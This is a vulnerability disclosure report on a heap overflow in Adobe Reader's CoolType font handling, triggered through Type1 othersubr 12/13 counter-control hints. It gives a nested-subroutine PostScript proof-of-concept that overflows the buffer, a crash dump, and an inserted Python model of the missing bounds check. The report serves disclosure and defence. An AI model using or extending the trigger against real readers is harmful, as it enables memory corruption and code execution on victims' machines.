In Type1 and OTF (Type2) glyph CharStrings, it is possible to provide an arbitrary number of parameters to the "Counter Control Hint" mechanism, using the special "othersubr 12" functionality to pass the data in packets of at most 22 integers, completed by an "othersubr 13" call with the remaining <= 22 arguments. To learn more about the mechanism, see section "Counter Control Hints" of [1].
Considering that the code responsible for implementing the special 12/13 subroutines found in the CoolType font library used by Adobe Reader does not perform any bounds checking, it is possible to overflow the constant-size heap-based buffer, thus corrupting heap headers and adjacent allocations. Such memory corruption can be potentially used to take over code execution flow and compromise system security.
It is not necessary to have thousands of othersubr 12 calls present verbatim in the font to trigger the condition (although this is also feasible); the font size can be greatly reduced by using nested subroutine calls to perform the attack. For example, the snippet of PostScript code shown below (consisting of 5 subroutines) inserts as many as 22 * (16 ^ 4) = 1441792 dwords of value 0x41414141 into the destination buffer:
---
dup 110 ## -| { 1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 1094795585 1094795585
1094795585 1094795585 22 12 callother return } |
dup 111 ## -| { 0 6 callother
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
110 callsubr 110 callsubr 110 callsubr 110 callsubr
return } |
dup 112 ## -| { 0 6 callother
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
111 callsubr 111 callsubr 111 callsubr 111 callsubr
return } |
dup 113 ## -| { 0 6 callother
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
112 callsubr 112 callsubr 112 callsubr 112 callsubr
return } |
dup 114 ## -| { 0 6 callother
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
113 callsubr 113 callsubr 113 callsubr 113 callsubr
return } |
---
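As an added illustration (not CoolType's code and not part of the original report), the following Python model of a charstring interpreter accumulates othersubr 12/13 arguments the way the text describes, reproduces the nested-subroutine amplification of the snippet above, and applies the bounds check that the vulnerable handler lacks. The buffer capacity, the nesting limit and the token encoding are assumptions of this model.

```python
from typing import Dict, List, Union

Token = Union[int, str]          # integer operand or operator name
Subrs = Dict[int, List[Token]]
MAX_SUBR_DEPTH = 10              # nesting limit chosen for this model (assumption)


class CharStringError(Exception):
    pass


def build_nested_subrs(depth: int, fanout: int, value: int = 0x41414141) -> Subrs:
    """Build subrs shaped like the page's snippet: subr 110 pushes 22 values via
    othersubr 12, and each higher subr calls the one below it `fanout` times."""
    subrs: Subrs = {110: [value] * 22 + [22, 12, "callother", "return"]}
    for level in range(1, depth + 1):
        body: List[Token] = [0, 6, "callother"] + [110 + level - 1, "callsubr"] * fanout
        subrs[110 + level] = body + ["return"]
    return subrs


def run(subrs: Subrs, entry: int, capacity: int) -> int:
    """Interpret subr `entry` and return the number of counter-control dwords
    collected. Raises CharStringError as soon as a packet would exceed `capacity`
    (the check a hardened othersubr 12/13 handler performs before copying)."""
    stack: List[int] = []
    buf: List[int] = []          # models the fixed-size counter-control buffer

    def exec_subr(n: int, depth: int) -> None:
        if depth > MAX_SUBR_DEPTH:
            raise CharStringError("subr nesting too deep")
        for tok in subrs[n]:
            if isinstance(tok, int):
                stack.append(tok)
            elif tok == "callsubr":
                exec_subr(stack.pop(), depth + 1)
            elif tok == "callother":          # args... argc othersubr# callother
                othersubr, argc = stack.pop(), stack.pop()
                if argc < 0 or argc > len(stack):
                    raise CharStringError("bad argument count")
                args = [stack.pop() for _ in range(argc)][::-1]
                if othersubr in (12, 13):
                    if argc > 22 or len(buf) + argc > capacity:
                        raise CharStringError(f"overflow: {len(buf) + argc} > {capacity}")
                    buf.extend(args)
                # other othersubrs (flex, hint replacement, 6) are no-ops here
            elif tok == "return":
                return
            else:
                raise CharStringError(f"unknown token {tok!r}")

    exec_subr(entry, 1)
    return len(buf)


def overflows(subrs: Subrs, entry: int, capacity: int) -> bool:
    """True if interpreting `entry` trips the counter-control bounds check."""
    try:
        run(subrs, entry, capacity)
        return False
    except CharStringError:
        return True
```

With depth=4 and fanout=16 the model collects exactly 22 * 16^4 = 1441792 dwords, matching the figure given above; any capacity below that makes the checked handler reject the glyph instead of writing past the buffer.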
Since the resulting number of bytes is much greater than the size of the destination buffer, the code crashes the Adobe Reader process, reliably illustrating the problem. An example crash summary is shown below, while a full version can be found in "crash.txt".
---
(f44.5a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000012 ecx=090f5000 edx=00000004 esi=0049d34c edi=090c7524
eip=6e0425cc esp=0049cd60 ebp=0049d428 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
CoolType!CTInit+0x407c5:
6e0425cc 8901 mov dword ptr [ecx],eax ds:002b:090f5000=????????
---
Adobe Reader 11.0.10 is confirmed to be affected, but we expect all prior versions of the software to be prone to the bug, too. The issue can be reproduced with both Type1 and OTF fonts. A Type1 Proof of Concept font is attached ("poc.pfm" + "poc.pfb"), together with its source code to be compiled with the type1 tool ("poc.pfa"), and an actual PDF file with the offending font file embedded.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
References:
[1] "Type 1 Font Format Supplement, Technical Specification #5015, 15 May 1994", http://partners.adobe.com/public/developer/en/font/5015.Type1_Supp.pdf